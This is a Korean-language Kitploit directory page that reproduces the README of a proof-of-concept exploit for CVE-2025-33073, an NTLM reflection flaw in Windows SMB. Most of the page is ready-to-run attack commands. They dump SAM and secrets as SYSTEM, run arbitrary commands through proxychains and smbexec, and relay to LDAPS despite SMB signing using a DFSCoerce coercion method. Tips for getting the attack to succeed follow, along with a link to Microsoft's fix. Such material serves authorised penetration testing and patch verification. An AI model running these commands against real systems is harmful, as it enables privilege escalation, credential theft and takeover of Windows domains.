Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-33073 — NTLM 리플렉션 SMB 취약점에 대한 PoC 익스플로잇. | Kitploit
도구/GitHubGitHub/mverschu/cve-2025-33073
Privilege EscalationVulnerability AnalysisExploitationNetwork SecurityPenetration TestingAuthentication
GitHubmverschu/cve-2025-33073

CVE-2025-33073

NTLM 리플렉션 SMB 취약점에 대한 PoC 익스플로잇.

저장소 보기
7141366개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-33073

NTLM 리플렉션 SMB 결함에 대한 PoC 익스플로잇.

이미지

모든 공로는 공식 연구에 있습니다:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

사전 요구 사항

OS: Kali Linux (대부분의 패키지가 사전 설치되어 있음).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (저장소에 포함됨)

설정

도구는 자동으로 가상 환경을 사용합니다. 설정하려면 다음을 실행하세요:

root@kitploit:~
./setup.sh

이 명령은 가상 환경을 생성하고 ldap3-bleeding-edge==2.10.1.1337을 포함한 모든 필수 종속성을 설치합니다.

사용 예시

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
이미지

사용자 지정 명령
secretsdump를 실행하는 대신 사용자 지정 명령을 실행할 수 있습니다.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

이미지

SOCKS
SYSTEM으로 유효한 연결이 설정된 후 명령을 더 은밀하게 실행하기 위한 옵션입니다. 여기서는 --target과 --target-ip가 동일해야 합니다.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

이미지 또한 SAM을 덤프하는 대신 proxychains를 통해 사용자 지정 명령을 실행할 수 있습니다.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

이미지

SMB 서명이 활성화된 상태에서도 LDAPS로의 릴레이 익스플로잇

SMB 서명이 활성화된 상태에서 리플렉션이 실제로 작동하지 않는지 확인하기 위한 연구가 수행되었으며, 그 결과 패킷에서 SIGN/SEAL을 제거하면 SMB에서 LDAPS로 릴레이할 수 있는 버그를 발견했습니다. 일반적으로 MIC 때문에 이는 불가능합니다.

감사 인사:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
이미지

DNS 요구 사항이 없는 수동 익스플로잇

장치와 동일한 브로드캐스트 도메인에 있고 LLMNR 중독(poisoning)에 취약한 경우 DNS 레코드를 등록하지 않고도 장치를 익스플로잇할 수 있습니다.

이미지

문제 해결

  • 공격에 호스트 이름을 사용하면 Kali에서 DNS 조회가 발생하여 공격이 때때로 작동하지 않는 것을 확인했습니다. Kali가 DNS 서버를 사용하지 않거나 impacket-ntlmrelayx에서 '/ FAILED' 메시지가 표시되면 호스트를 /etc/hosts 파일에 추가해 보세요. 그러면 공격이 작동할 것입니다.
  • IP를 사용하면 공격이 작동해야 합니다. 때로는 여러 번 실행하면 실패 대신 SUCCESS가 발생하기도 합니다. 지금까지 왜 이런 일이 발생하는지 정확히 명확하지 않습니다. 네트워킹과 관련이 있는 것 같습니다.
  • -M 또는 --method를 사용하여 다른 강제(coerce) 방법을 시도하세요.

Wireshark

로컬 NTLM 인증이 수행됨 이미지

로컬 NTLM 인증이 수행되지 않아 FAILED 시도가 발생함 이미지

참고 사항

  • DNS 레코드는 클라이언트에도 알려져 있어야 합니다. 경우에 따라 시간이 더 걸릴 수 있습니다. 시간이 더 걸린다는 것은 몇 분 정도 기다리라는 뜻입니다.
  • 이것은 단순한 PoC이므로 AV/EDR 우회를 시도하지 않았습니다. 사용에 따른 책임은 본인에게 있습니다.

수정 방법

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

도구 다운로드